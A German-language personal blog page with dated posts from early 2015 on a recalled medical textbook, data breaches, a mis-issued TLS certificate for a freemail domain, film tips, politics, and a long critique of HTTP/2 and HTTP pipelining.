Mein Freund Frank hat "Knowledge brings fear" als Motto seines Blogs gewählt. Ich hatte nie ein Blog-Motto und fand sein Motto anfangs prätenziös. Aber wo er Recht hat, hat er Recht. Wäre es vielleicht einfacher, wenn ich mich mit dem ganzen Scheiß nie beschäftigt hätte? Eine Konstante über die 10 Jahre sind die Zuschriften geblieben, die wissen wollen, wie ich es eigentlich schaffe, mich durch diesen ganzen Klärschlamm zu wühlen, ohne dabei den Willen zum Leben zu verlieren. Eine gute Antwort habe ich darauf nie gehabt.
Am Ende des Tages muss man da durch, glaube ich. Augen Schließen hilft auch nicht.
Eine andere Konstante über die Jahre sind Zuschriften gewesen, die mir schreiben, ich soll mal bei meinen Leisten bleiben. Von Computern verstünde ich ja möglicherweise was, aber von Politik, Kernphysik, Pharmakologie, Impfen, Chemtrails, den Illuminaten hätte ich ja mal sowas von gar keine Ahnung! Dass ich nicht merke, wie ich da gerade meine Glaubwürdigkeit verspiele!
Ich bin ein Freund der Datensparsamkeit, daher habe ich kein Archiv der Zuschriften über die Jahre. Aber zum Jubiläum habe ich das ein bisschen bereut, und ich dachte mir, ich könnte ja mal ein paar Leute anschreiben, die sowas wirklich beurteilen können, und um Kommentare bitten.
Und ich hatte ja auch generell um Zuschriften gebeten. Viel Spaß!
Update: Ich schreibe die Namen nur in den Fällen dran, bei denen ich den Kommentar explizit eingeworben habe, und vorher angesagt habe, dass der Name dran stehen würde, und derjenige das gutgeheißen hat.

Thu Mar 26 2015

[l] Ich muss hier mal kurz eine Mail durchreichen.
Sehr geehrte Damen und Herren,
leider mussten wir feststellen, dass der Titel Heck, Fresenius, Busch: Repetitorium Anästhesiologie, 7. Auflage, ISBN 978-3-642-36942-1 aufgrund produktionstechnischer Probleme mehrere gravierend falsche Dosierungsangaben enthält. Aus diesem Grund sahen wir uns gezwungen, die Printausgabe aus dem Handel zurückzurufen und das entsprechende E-Book von SpringerLink, Springer for R&D und Springer for Hospitals and Health zu entfernen.
Wir bedauern diesen Umstand sehr und möchten Sie bitten, Ihre Nutzer in geeigneter Form darüber zu informieren, dass das betreffende E-Book aufgrund der genannten falschen Angaben nicht weiterverwendet werden sollte und gespeicherte Kopien sicherheitshalber zu löschen sind.
Eine überarbeitete 8. Auflage des Titels wird in Kürze veröffentlichen werden.
Für etwaige Rückfragen stehen wir Ihnen unter der E-Mail-Adresse libraryrelations@springer.com gerne zur Verfügung.
Wir danken für Ihr Verständnis.
Ich denke ja in letzter Zeit häufiger darüber nach, wie ich mir am Anfang meiner Karriere felsenfest vorgenommen habe, dass ich niemals Dinge programmieren wollen würde, bei denen am Ende Menschenleben auf dem Spiel stehen. Keine Kraftwerke, keine Reaktoren, nichts mit Flugzeugen, keine medizinischen Geräte, Militärkram sowieso nicht. Und dann habe ich Leute getroffen, die sowas programmieren. Und mir wurde spontan klar: Wenn ich das nicht mache, dann machen es Leute, denen ihre Grenzen weniger bewusst sind. Ich habe mich trotzdem weitgehend daran gehalten.
Ausnahmen waren einmal eine Sensoriksache, bei der es um den Säuregehalt im Boden ging, und einmal eine Visualisierung von Vektoren, die aus einem Kernspinbild eines Schädels extrahiert waren und am Ende den Kopf ergaben.
Ich denke da häufiger dran zurück, weil ich mich frage, wo ich diese Schranke eigentlich genau ziehen mus. Diese Erd-Säure-Geschichte ging um eine Agraranwendung, das war vermutlich harmlos. Aber genau wissen tue ich es halt nicht. Die Schädelsache war eine reine Visualisierung, so habe ich mir das damals schöngeredet, aber heute denke ich mir, dass die Ärzte ja anhand der Visualisierung ihre Entscheidungen treffen. Das schätze ich heute als Fehler ein, da mit gemacht zu haben. Am Ende war das nur für einen Demonstrator und hat nie den medizinischen Einsatz gesehen, soweit ich weiß jedenfalls.
Aber wenn ich eine Story wie die hier lese, dann frage ich mich schon, was "produktionstechnische Probleme" sind. Ob man auch die Elemente einer Druck-Pipeline als potentiell lebensgefährdend einstufen muss.

Wed Mar 25 2015

[l] Die Polizei, dein Freund und Helfer: Polizist wegen Strafvereitelung im Amt verurteilt. *augenreib* Nein, wirklich!
Die Richterin sah es als erwiesen an, dass G. sich nicht bloß falsch erinnere, sondern bewusst und vorsätzlich eine falsche Aussage gemacht habe, um seinen Kollegen zu schützen. Damit folgte das Gericht der Auffassung und dem vorgeschlagenen Strafmaß der Staatsanwaltschaft.
Nanu? Was ist denn da plötzlich los? (Danke, Ralf)

Tue Mar 24 2015

[l] Hier gehen gerade ein Haufen Panik-Mails wegen Lighteater ein. Kurz gesagt: *gähn*
Technisch ist das eine brilliante Leistung, was die da gemacht haben, weil dieses ganze SMM-Zeug immer als eine Kreuzung aus Voodoo und schwarzer Magie galt, wenig bis gar nicht dokumentiert, man kennt es nur vom Spätnacht-Raunen am Lagerfeuer.
Aber mal bei Tageslicht betrachtet ist die Erkenntnis hier: Wenn ihr bösartigen Code ausführt, kann der böse Dinge tun. Das sollte nun echt niemanden mehr hinter dem Kamin hervorlocken.
Natürlich ist es besonders böse, wenn sich Malware so persistieren kann, klar. Vielleicht versteht jetzt der eine oder andere, wieso ich neulich so sauer wurde, als Lenovo seinen Usern verbieten wollte, das Bios neu zu flashen, um Sicherheitslücken zu fixen.

Mon Mar 23 2015

[l] Cloud-Computing FTW: Beim "Hamburger Big-Data-Startup Kreditech" sind ein paar Daten rausgetragen worden. Was denn so?
„Es ist richtig, dass eine begrenzte Menge sensibler Daten wie Scans von Ausweisdokumenten oder E-Mail-Adressen potenzieller Kreditech-Kunden von einem Unbekannten gestohlen wurden“, sagt ein Polizeisprecher.
Das war im Sommer 2014. Wieso haben wir davon nichts gehört?
Kreditech hat den Vorfall nie öffentlich gemacht.
Hrm. Das klingt ja schon ziemlich übel. Von wieviel Daten reden wir denn hier konkret?
mehrere Gigabyte Logdateien, dann mehrere tausend individuelle Angebote für Darlehensverträge, außerdem mehr als 2.000 Scans und Fotos von Ausweisdokumenten. Darin enthalten sind sensible persönliche Daten: Email-Adressen, Klarnamen, Geburtsdaten, Telefonnummern, Ausweisdaten.
Au weia. Was sagt denn Kreditech dazu? Lest selbst.
Mein persönliches Highlight ist diese an Kompetenz und Spezialexpertentum kaum zu überbietende Einschätzung eines Technikphilosophen:
„Es sieht mir schon nach sensiblen Daten aus“, sagt Gaycken, „allerdings auch nicht so wahnsinnig sensibel.“
Gut, dass wir das geklärt haben!
Update: Siehe auch…

Sun Mar 22 2015

[l] Filmtipp: The Company You Keep. Den wollte ich seit Jahren schon sehen und bin jetzt endlich dazu gekommen. Der Film handelt von Terroristen des Weather Underground, die sich seit 30 Jahren unter falschem Namen verstecken. Der Weather Underground (zu denen es übrigens eine ebenfalls empfehlenswerte Dokumentation gibt) war sowas wie die US-Version der RAF, aber sie haben nicht entführt sondern Bombenanschläge gemacht und die gingen auch nicht gegen Banker oder den Kapitalismus sondern gegen sowas wie ein Polizeirevier und das Pentagon. Der Film wirft mehrere wichtige ethische Fragen auf. Der hat zwar Actionszenen und ist als Thriller gekennzeichnet, aber es ist kein Actionfilm und man sollte ihn auch nicht sehen, weil man einen Thriller gucken will. Es ist eher ein kontemplativer Film, der einen zum Nachdenken bringt. Die Ratings bei IMDB und Rotten Tomatoes sind eher mau, was ich nicht nachvollziehen kann.
Übrigens, ein ebenfalls ausgesprochen empfehlenswerter Film ähnlichen Inhalts gibt es auch im RAF-Kontext aus Deutschland, der heißt Die innere Sicherheit. Den habe ich vor vielen Jahren gesehen und denke immer noch über ihn nach.
Viel Spaß beim Angucken!
Update: Ein Hinweis noch: In der Realität haben die Weather Underground-Leute nie jemanden getötet oder verletzt, immer "nur" Sachschaden verursacht.

Fri Mar 20 2015

[l] Angeblich schreibt Microsoft mit Windows 10 nicht mehr vor, dass man Secure Boot auch abschalten können muss. Damit bliebe diese Entscheidung bei so Leuten wie HP, Dell und Lenovo. Und wie vertrauenswürdig die so im Allgemeinen sind, sieht man ganz gut daran, wieviel Crapware die vorinstalliert ausliefern bei ihren Laptops.
Oh, bei der Gelegenheit sollte ich vielleicht mal ansagen, wie meine Laptopsuche ausgegangen ist. Ich habe mir am Ende einen Laptop von Schenker bestellt, nachdem die großen Hersteller bei mir alle der Reihe nach durchgefallen sind. So ein Gamer-Modell namens XMG P505, weil ich gerne zuschaltbare Gamer-Grafik haben wollte, aber trotzdem ordentlichen matten Bildschirm, geräuschloses Arbeiten wenn ohne Last, Gigabit Ethernet und halbwegs brauchbare Batterielaufzeiten. Das alles erfüllt das Gerät im Rahmen der Möglichkeiten der Hardware, und: Keinerlei Crapware vorinstalliert bei dem Windows. Keine 50 Trial-Version von irgendwelchen Antiviren oder Ähnlichem.
Gut, das ist dann natürlich kein Ultrabook. Das Gerät ist vergleichsweise schwer. Dafür ist das Gehäuse auch aus Metall und knarzt und knirscht nicht. Und, für mich besonders wichtig: Es gibt da keine Einschränkungen bei den Treibern. Das hat mich bei HP immer wahnsinnig gemacht, das man da keinen Grafiktreiber von AMD installieren konnte unter Windows, sondern den von HP nehmen musste, der 4 Jahre veraltet war. Daher boykottiere ich HP, seit die das einmal mit mir gemacht haben. Kam auch trotz Kurzfrist-Bestellung vor Weihnachten innerhalb einiger Tage, da hatte ich echt Schlimmeres befürchtet (das war wohl Glück, es gibt da im Internet auch andere Schilderungen).
Oh und deren Trackpad hat noch echte Maustasten.

Wed Mar 18 2015

[l] Ich weiß ja nicht, ob ihr ZDF Neo auf dem Radar habt. Seit dieser Nummer mit TV Total haben sie sich einen Spot verdient. Aber hey, Privatsender Trollen sieht vielleicht der eine oder andere nicht als satisfaktionsfähig an. Das kann ja jeder.
Nun, die haben auch das Varoufakis-Stinkefinger-Video gemacht, das neulich bei Jauch so peinlich durchexerziert wurde. Die Speerspitze der "Bild"-Anti-Griechenland-Propaganda. Ja, DAS Video. Das kommt von der Crew um den Böhmermann.
Wenn ihr sonst nie auf Links hier klickt, KLICKT JETZT AUF DIESEN LINK. Aber setzt euch vorher stabil hin. Lieber kein Popcorn, nicht dass sich jemand verschluckt und erstickt. Groß-ar-tig! Das waren übrigens auch die hinter V for Varoufakis :)
Update: Jetzt kommen hier Mails rein, dass dieses Bekennervideo ein Fake ist. Schon denkbar. Aber erstens ist die Faktenlage dafür eher dünn (ein "Originalvideo" zu einer Veranstaltung von 2012 wird im Februar 2015 hochgeladen?) und zweitens: Ja und wenn? Der Punkt ist doch, dass ein großer Teil (ich tippe sogar: Die Mehrheit) der Bevölkerung sofort glaubt, dass Jauch und co lügen oder zumindest nicht ordentlich recherchieren. Die Medien haben unser Vertrauen verspielt. Das ist ein viel größeres Problem als ob der Varoufakis jetzt auf einem jahrealten Video seinen Mittelfinger gezeigt hat oder nicht.
Update: Hier ist noch ein wunderbarer Photoshop, der bei der Einordnung hilft. Der unseriös aussehende Mann rechts unten, den werden einige der jüngeren Leser vielleicht gar nicht kennen. Das ist der hier. Und die Szene da sieht ohne Photoshop so aus.
Update: Und einen hab ich noch. Wieso erwähnt eigentlich der Videofilmer des "Originals" namentlich den Böhmermann am Ende? Woher kennt der den überhaupt, wenn das bloß alles ein Rückwärts-Fake ist?
Update: Und noch einen hab ich: Das war mit Ankündigung :-)
Update: Das ZDF sagt, es handele sich um eine Satiresendung.
ZDF-Programmdirektor Norbert Himmler ironisch zu SPIEGEL ONLINE: "Wir sehen uns gezwungen, das 'Neo Magazin Royale' zukünftig als Satiresendung zu kennzeichnen." Für die Moderation des "heute-journals" werde Jan Böhmermann "sicherheitshalber vorerst ausgeschlossen".
Update: ZDF Neo ist der Name des Senders, auf dem die Sendung immer lief. Die Sendung heißt Neo Magazin Royale. Die läuft jetzt offenbar auch im normalen ZDF (das wusste ich nicht).
[l] Habt ihr schon mal ein TLS-Zertifikat gekauft? Für eine Webseite oder so? Das läuft im Allgemeinen so ab, dass man denen die Domain sagt, und dann wählt man eine "Admin-Email-Adresse" an dieser Domain aus, z.B. postmaster@ oder root@ oder so, welche da konkret angeboten werden hängt vom Anbieter ab. Dort schicken die dann eine Email hin, mit einem Link drin, und da klickt man dann drauf, und schwupps glaubt einem das System, dass einem die Domain gehört.
Das ergibt natürlich interessante Angriffsszenarien für so Freemailer-Domains wie gmx.net oder live.fi, wo man sich im Internet eine Mailadresse klicken kann. Wenn die TLS-Leute eine Admin-Adresse erlauben, die der Freemailer nicht reserviert hat, dann kann man sich so ein Zertifikat klicken.
Eine dieser historischen Admin-Adressen ist hostmaster@.
Ein erlebnisorientierter Jugendlicher hat sich mal hostmaster@live.fi geklickt und dann damit ein TLS-Zert von dem Taco Bell unter den TLS-Anbietern geklickt: Comodo. Comodo hat ihm das ausgestellt. Warum auch nicht, da sitzt ja kein Mensch und prüft. Das ist ein Perl-Skript. Woher soll das Perl-Skript wissen, dass live.fi reserviert ist?
Und hier wird die Story interessant. Der Mann hat das nämlich Microsoft gemeldet, und die haben ihn ignoriert und 4-6 Wochen lang das Problem ausgesessen.
Dann haben sie dem Mann den Microsoft-Account gesperrt, was das Mail-Konto, das Xbox-Konto und das Lumia-Handy mit einschloss.
Ausgesprochen unsportlich, Microsoft!
Update: Oh, ist sogar noch unsportlicher! Es gibt eine Richtlinie, wie CAs die Domains zu validieren haben. An denen hat Microsoft mitgearbeitet. So und jetzt guckt euch mal auf Seite 24 (17 nach Dokumenten-Zählung) Punkt 4 unter 11.1.1 an. Microsoft hat also den Standard mitgeschrieben, an den sich Comodo gehalten hat.
Update: Der Depp hatte die Domain anscheinend mit seinem live-Account verknüpft, also haben die den Live-Account zugemacht. Das klingt ja wiederum eher nach "User nicht schlau"-Fehler. Man kann natürlich immer noch die Frage stellen, wieso das sechs Wochen gedauert hat. Und ob sie da nicht mal hätten gucken können, ob man da weniger invasiv hätte vorgehen können.
Update: Oh das wird ja immer schöner. Die hatten das selbe Problem auch bei der belgischen Domain und da geht das sogar bis 2010 zurück. Und sie haben nichts daraus gelernt.

Mon Mar 16 2015

[l] Stefan Niggemeier niggemeiert mal dpa und die "Welt" von der Seite an :-)
Die "Welt", die, wir erinnern uns, Deutschland in der "Leading European Newspaper Alliance" vertritt.
Was hatten die denn falsch gemacht, um den Zorn des Niggemeier auf sich zu ziehen? Och, ist eigentlich kaum erwähnenswert. Sie haben lediglich, um den Varoufakis besser anpinkeln zu können, aus 800 Millionen Schweizer Franken 800 Milliarden Schweizer Franken gemacht. Das ist die Menge an griechischen Geldern, die angeblich schwarz in der Schweiz lagert.
Oh und wo wir gerade bei Niggemeier waren: Seine Ausführungen zu der Jauch-Varoufakis-Stinkefinger-Nummer sind auch lesenswert.
Sehr schön, weitermachen! Also Niggemeier jetzt. :)
[l] Putin ist wieder aufgetaucht. Das lustige ist, dass die Behörden wie damals zu Sowjetzeiten alle komplett dicht gehalten haben. Jetzt heißt es, er war bloß auf seinem Landsitz und hat eine Woche Ferien gemacht, und hat vorher Bescheid gegeben, und es gab auch eine Flugverbotszone über dem Haus, und er hat vorher auch schnell noch ein paar Gesetze unterschrieben, um dem Tisch frei zu kriegen. Also alles ganz normal für einen Urlaub. Wieso haben die das den spekulierenden Pressefuzzies dann nicht einfach gesagt?

Sat Mar 14 2015

[l] Man kann ja viel sagen über die Griechen, aber ihre Hausaufgaben haben sie gemacht:
Kammenos hielt Schäuble auch dessen Verwicklung in die CDU-Parteispendenaffäre vor: "Wir Griechen erinnern uns genau, dass Herr Schäuble sein Amt als Parteivorsitzender aufgeben musste, weil er in einen Fall von Bestechung verwickelt war. Heute ist er trotzdem Finanzminister." Bei aller Kritik an der Korruption in Griechenland sei es ja nicht so, dass Deutschland oder Schäuble immer fehlerfrei gewesen wären.
MWAHAHAHAHAHA (Danke, Ralf)

Fri Mar 13 2015

[l] Öh, nanu? Die Schwedische Staatsanwaltschaft bietet jetzt plötzlich an, Julian Assange in London zu befragen, statt auf der Auslieferung zu beharren. Was ist denn da passiert? Haben die Briten Druck gemacht, weil sie da jährlich völlig sinnlos Unsummen in das Bewachen der Botschaft stecken, um ihn zu erwischen, wenn er einen Fluchtversuch unternimmt?

Thu Mar 12 2015

[l] Der "Hillary hat ihre Mails über ihren privaten Mailserver gemacht"-Skandal blubbert weiter vor sich hin. In der Zwischenzeit hat Hillary angesagt, dass sie ihre Mails rausrücken wird, wie es im Gesetz gefordert ist. Viele nahmen an, dass das heißt, dass sie ihren Mailserver rüberrückt. Hillary Clinton hat ein paar Mails rausgerückt, aber den Server behält sie, und angeblich hat sie 32.000 private Mails gelöscht. Lustigerweise sagt sie auch, dass ihre Vorgänger das genau so gehandhabt haben.

Mon Mar 9 2015

[l] Ich fürchte, HTTP/2 wird ein Schuss in den Ofen. Um zu verstehen, was HTTP/2 macht, muss man sich erst mal angucken, was HTTP/1 macht, und wo die Probleme liegen. HTTP/1 sieht im Wesentlichen so aus:
```
GET / HTTP/1.1
Host: www.server.com:80
```
Das ist ein HTTP-Request. Die Antwort sieht dann so aus:
```
HTTP/1.1 OKhuhu
```
Das Problem ist jetzt, dass das idealisierte Beispiele waren. Tatsächlich sehen Requests nämlich so aus:
```
GET / HTTP/1.1
Host: www.cnn.com:80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: token=kiMLX8/1ni34+wrDrAfx7XDDNjSLJhzIXFL27VY2SwM=
Connection: keep-alive
```
Und Antworten sehen so aus:
```
HTTP/1.1 200 OK
x-servedByHost: prd-10-60-165-21.nodes.56m.dmtio.net
Cache-Control: max-age=2592000
Content-Type: text/html
Via: 1.1 varnish
Content-Length: 11502
Accept-Ranges: bytes
Date: Mon, 09 Mar 2015 16:37:46 GMT
Via: 1.1 varnish
Age: 702161
Connection: keep-alive
X-Served-By: cache-iad2130-IAD, cache-lax1421-LAX
X-Cache: HIT, HIT
X-Cache-Hits: 1414, 5
X-Timer: S1425919066.634699,VS0,VE0
Vary: Accept-Encoding

[… der HTML-Inhalt …]
```
Praktisch alles davon ist überflüssig. Sowohl auf Client-, als auch auf Serverseite. Ein Teil davon ist dem Standard geschuldet (wieso muss der Server bitte das Datum mitschicken?!), aber der Großteil ist einfach Bloat von Clients und Servern. Alleine schon der User-Agent ist eine Größenordnung zu groß. Der Accept-Header ist ein typischer Fall von Feature Creep, war mal gut gemeint, hat aber so dermaßen auf ganzer Linie verkackt, dass da jetzt "*/*" als "akzeptierter MIME-Type" drin steht. Damit wird natürlich die Intention des Headers völlig unterwandert und man könnte ihn auch eigentlich komplett weglassen. Ähnlich sieht es mit Accept-Languages aus. Das war mal dafür gedacht, dass der Browser sagt "mein Benutzer spricht Deutsch, kann aber auch Englisch", und die Webseite gibt dann ihre deutschsprachige Version heraus. Das benutzen tatsächlich einige Webseiten. So gefühlt 3 oder 4. Hätte man sich also auch sparen können. Accept-Encoding sagt, dass der Browser auch gzip und deflate kann. Das hätte man schlicht als Default in den Standard schreiben können, dann würde man sich das sparen, dass alle Browser das mitschicken. DNT ist der Do-Not-Track-Header. "Liebe Werbetreibenden, bitte missbraucht meine Daten nicht!1!!" Ja nee, klar. Die Cookies sind im Verantwortungsbereich des Webseitenbetreibers, da kann der Browser nichts für. Der Connection-Header hier ist auch für den Fuß, weil keep-alive bei HTTP/1.1 Standard ist. Aber sicherheitshalber, falls der Server nur 1.0 kann, schicken wir es nochmal mit. Ihr seht schon, das ist ein verkrusteter Haufen fossiler Brennelemente.
Schlimmer noch sieht es auf der Serverseite aus. Da sind die Hälfte der Header direkt für die Tonne und kommen auch offenbar gar nicht vom Webserver sondern von dem Varnish-Cache davor. So nützlich wie ein Hirntumor!
So und jetzt schauen wur uns das mal zusammen an und überlegen uns eine Strategie. KLAR! Die Cookies sind das Problem!1!! Also war die Lösung der Webseiten-Optimierer-Spezialexperten, dass sie die 100 Milliarden Inline-Bilder auf eine separate Domain ausgliedern. Dann werden bei den Requests an die keine Cookies der Hauptdomain übertragen. WAS MAN DA FÜR EINEN TRAFFIC SPART!!1! Leider handelt man sich auch einen zusätzlichen DNS Round Trip ein. Aber hey, das sieht man in Benchmarks nicht so, weil das eh schon im Cache ist!1!!
Kurzum: HTTP/1.0 hat Probleme in der Praxis. Beachtet aber das "Connection: keep-alive". Das heißt, dass der Server die Verbindung nach diesem Request offen hält. Der Client kann dann den nächsten Request absetzen. Das entsorgt direkt das wichtigste Argument für HTTP/2, das mit dem "wir wollen aber nur ein Handshake am Anfang der Verbindung haben, weil das so teuer ist".
Also haben die HTTP/2-Apologeten argumentiert, naja gut, das Handshake ist nicht das Problem, sondern die Latenz pro Antwort ist das Problem. Um das zu illustrieren, muss man ein bisschen malen. Ich mache das mal in ASCII Art, mit ??? für den Request und === für die Antwort.
```
???   ???
   ===   ===
```
So stellt man sich eine typische HTTP-Verbindung vor. So ist das auch — im LAN. Über das Internet gibt es Latenzen zwischen ??? und ===. Die male ich jetzt mal als |||.
```
???         ???
   |||   |||   |||   |||
      ===         ===
```
Ihr seht, diese Latenzen dominieren schnell. Daher gibt es in HTTP/1.1 ein Verfahren namens Pipelining. Das sieht dann so aus:
```
?????????
   |||||||||||||||
      =========
```
Die Latenz ist nicht weg, aber sie ist viel weniger schlimm. Leider implementieren das einige wenige Webserver nicht. Und um diese Webserver im Geschäft zu halten, schalten die Browser Pipelining aus. Nein, wirklich! Geht mal in Firefox auf about:config und sucht nach network.http.pipelining.
Weil das der zentrale argumentative Dreh- und Angelpunkt der HTTP/2-Apologeten ist, will ich jetzt mal einen Trick mit euch teilen.
Der Grund, wieso einige Webserver Pipelining nicht können, ist, dass deren Haupt-Schleife so aussieht:
Solange TCP-Verbindung besteht:
Lese Daten
Wenn die Daten ein HTTP-Request sind, beantworte ihn
Bei Pipelinig kommen jetzt mehrere Requests in einem Stück Daten rein. Der Server hat die Logik nicht, um hinter dem 1. Request nach weiteren zu gucken. Aber man kann auch mit so einem Server Pipelining machen. Ich habe das vor vielen Jahren mal für einen Usenet-Downloader implementiert, und später für SMB, bei HTTP geht das genau so. Man schickt den nächsten HTTP-Requests nicht, nachdem das letzte Byte der Antwort des vorigen angekommen ist, sondern nachdem das erste Byte der Antwort des vorigen angekommen ist.
Das lohnt sich leider erst, wenn die Downloadgrößen deutlich größer als die Request-Größen sind. Daher ändere ich mal die Symbolik ein bisschen in der ASCII-Art. Vorher:
```
???     ???
 vvv ^^^   vvv
    ===============
```
Was die Grafik euch sagen will: Der zweite Request kommt beim Server an, während der noch den ersten beantwortet. So kann man das machen. Warum das bei HTTP keine Option war? Weil inzwischen bei einigen Sites für einige Requests die Header größer als die Inhalte sind.
Meine Einstellung dazu ist: Einfach immer Pipelining vorschreiben und anschalten, und wer das nicht implementiert, der kann halt nicht mitspielen. Ich hab das am Anfang in gatling auch nicht implementiert gehabt, weil es eh keiner benutzt hat. Diese Art von Verhalten geht überhaupt nur, weil die Browser einen damit durchkommen lassen. Das sollten sie nicht.
Hat HTTP/2 denn jetzt überhaupt keine Vorteile? Doch. Zwei. Erstens haben sie sich ein Verfahren überlegt, um Header zu komprimieren. Ich habe mir davon die Details noch nicht angeguckt. Ich sah bisher nur Negatives darüber, aber das will ja nichts heißen. Zweitens schreiben sie für den TLS-Teil TLS 1.2 vor.
Merkt ihr was?
Wir könnten auch einfach HTTP/1.1 nehmen, Pipelining und TLS 1.2 vorschreiben, und wir hätten so gut wie alle Vorteile von HTTP/2 ohne die Nachteile.
Welche Nachteile? Nun, HTTP/2 macht Multiplexing. Multiplexing heißt, dass sie mehr als eine virtuelle Verbindung über eine TCP-Verbindung fahren. Das ist eine ganz beschissene Idee.
Stellt euch mal Youtube vor. Sobald er das Video überträgt, ist die Multiplex-Verbindung ausgelastet und die Kommentare kommen nie. Außer der Server hat Logik, um faires Scheduling zu implementieren. Ja ganz groß!
Geht noch weiter. Stellt euch mal vor, der Server hat fair scheduling implementiert. Ist immer noch Scheiße. Denn einige Elemente einer Webseite können andere Elemente referenzieren, Inline-Bilder, Skripte, was auch immer. HTML und CSS sollten daher zuerst übertragen werden, auch damit der Browser schonmal das Layout machen kann, und dann später die Bilder reinlädt. Jetzt muss der Server also schon intelligentes Scheduling implementieren. Am besten mit Content Sniffing. Denn das wird die nächste Anforderung sein, dass der Server das HTML/CSS parsed und die Dateien schonmal öffnet und reinlädt, die der Browser gleich haben wollen wird.
Aber nein, da haben die HTTP/2-Leute eine noch bessere Idee gehabt. Sie sehen vor, dass der Browser dem Server sagt, was mit welcher Priorität kommen soll.
Ihr sehr schon: Alleine um Probleme zu lösen, die wir vorher nicht hatten, treiben wir hier ungefähr so viel Aufwand, wie wir vorher für den ganzen Webserver getrieben haben.
Daher glaube ich, dass HTTP/2 ein Schuss in den Ofen ist.
Aber wartet. Einen habe ich noch. Nehmen wir mal an, wir haben Paketverlust auf der Leitung. Bei HTTP/1 bleibt dann eine Verbindung stehen. Eine von sechs oder wieviel auch immer der Browser aufgemacht hat. Bei HTTP/2 bleibt dann alles stehen, weil alles über die eine Verbindung ging. JA SUPER!
Erwähnte ich, dass HTTP/2 mit dem Header-Wildwuchs nicht aufgeräumt hat? Dafür gibt es ja jetzt Kompression. Hier ist die Spec dazu.
Leider haben die auch ansonsten im Protokolldesign und der Spec einmal großflächig alles verkackt, was man so verkacken kann. Klickt euch mal in diesem Mailinglistenarchiv nur durch die Postings von Bob Briscoe der letzten Tage. Übrigens ist auch der Autor von varnish nicht begeistert von HTTP/2.

Sun Mar 8 2015

[l] Bei mir schlagen gerade gehäuft Fälle von "wo sind meine Logs? Wieso hab ich hier plötzlich systemd und warum hat der meine Logs weggeschmissen!?" auf.
Ich frage mich, ob Debian das mitkriegt, wenn ihnen die Nutzerzahlen wegbrechen.
Ich habe neulich ja aus Testgründen mal Arch Linux installiert und der hat mir auch erstmal ungebeten systemd installiert. Ich glaube, das wird bei Linux jetzt was die ganze Ad- und Bloatware bei Windows ist. Nach der Installation muss man erstmal den ganzen ungewollten Scheiß wegoperieren, den einem die Distro so auf die Platte spült. Sehr schade, dass wir die negativen Aspekte von Windows kopieren, bevor wir die positiven nachgemacht haben.
[l] Habt ihr "An Inconvenient Truth" gesehen, diesen Al-Gore-Film zum Klimawandel? So einen ähnlichen Film gibt es auch in China, er heißt "Under the Dome", lustigerweise nach einer amerikanischen TV-Serie bekannt. Der Film war in China erfolgreich genug, dass die Regierung die Webseite zugemacht hat. Nun spricht wahrscheinlich nicht jeder von euch fließend Chinesisch, daher: Hier ist eine Version mit englischen Untertiteln. Lohnt sich!

Thu Mar 5 2015

[l] Die fiesen Fieslinge von Netzpolitik.org haben mal eine Netzneutralitäts-Übersicht gemacht. Die fällt, wie zu erwarten war, eher negativ aus.

Fri Feb 27 2015

[l] Putin hat mit Zypern einen Deal gemacht.
Den russischen Streitkräften stehen damit für »humanitäre Operationen« und »in Krisensituationen« der Hafen Limassol und der Luftwaffenstützpunkt »Andreas Papandreou« bei Paphos zur Verfügung.
Das ersetzt jetzt weder Syrien oder die Krim als Flottenstützpunkt, aber das ist glaube ich auch nicht der Punkt hier.
Wie haben die Russen das geschafft? Mit ein bisschen Druck:
So wurde den Zyprioten während ihrer Bankenkrise 2013 eine Umschuldung in Höhe von 2,5 Milliarden Euro für einen russischen Kredit aus dem Jahr 2011 verweigert und die klamme Republik damit dem Würgegriff der EU-Finanzinstitutionen ausgeliefert. Erst nach Fortschritten in den Gesprächen über die Nutzung von Militärstützpunkten erklärte sich Moskau im September 2013 zu einer Umstrukturierung der Schulden bereit. Im Gegenzug für das jetzt geschlossene Abkommen sagte Putin weitere finanzielle Unterstützung zu.
Das finde ich recht unglücklich formuliert, denn was kann denn Russland dafür, dass Zypern im Würgegriff der EU-Finanzinstitutionen war? Das klingt ja so, als habe Russland hier eine moralische oder sonstige Verpflichtung gehabt, Zypern vor der EU zu retten.

Thu Feb 26 2015

[l] Schönes Interview mit Martin Sonneborn.
Bei 240 Abstimmungen in 40 Minuten, das war das Schnellste was ich mitgemacht habe, ist es teilweise unmöglich sich zu merken, ob man gerade mit Ja oder mit Nein gestimmt hat. Und es kommen dann noch die Handabstimmungen hinzu, die ich oft gar nicht mitmache. Die Rechtsradikalen, gerade die FPÖ, haben trainiertere rechte Oberarme.
WTF? 240 Abstimmungen in 40 Minuten?! (Danke, Lukas)
[l] Kennt ihr das Kunstprojekt Dead Drops? Da hat jemand USB-Sticks an öffentlichen Orten in Hauswände eingemauert, so dass der Stecker noch rausragt. So kann sich da jeder physisch hinbewegen und auf die Daten zugreifen oder neue hochladen.
Das hat offenbar jemand genutzt, um in Köln ein paar Bombenbauanleitungen abzulegen.
Ergebnis: Die Polizei stemmte die Wand auf, um den Stick rauszuholen. m(

Wed Feb 25 2015

[l] Lesetipp: A new geography of European power?
Da hat sich mal so ein Think-Tank-Verbund Gedanken gemacht, wie Europa aussehen sollte, wenn man sowas eine US-Kissinger-Brzezinski-Doktrin als Maßstab anlegt. (Danke, Harald)

Mon Feb 23 2015

[l] Ooooh, BURRRRRRRN: sogar ISIS macht sich über Impfgegner lustig.
Oh und wo wir gerade bei unwissenschaftlichem Bullshit waren: guckt mal hier.
Einer der führenden Wissenschaftler, auf die sich weltweit die Leugner des menschengemachten Klimawandels berufen, ist jahrelang heimlich für seine Arbeit von der Kohle- und Öllobby finanziert worden.
NA SOWAS.

Tue Feb 17 2015

[l] Die Bundeswehr soll bei einem Nato-Manöver in Norwegen wegen fehlender Waffenrohre schwarz angemalte Besenstiele an ihre Panzerfahrzeuge montiert haben. (Danke, Pedro)

Fri Feb 13 2015

[l] Filmtipp: Alphabet, dann hoffentlich ab morgen in der Mediathek verfügbar. Von dem Team, das auch "We Feed the World" und "Let's Make Money" gemacht hat, und das reicht mir schon für eine Empfehlung. Wenn ihr diese beiden Filme noch nicht geguckt habt, solltet ihr das dringend nachholen.
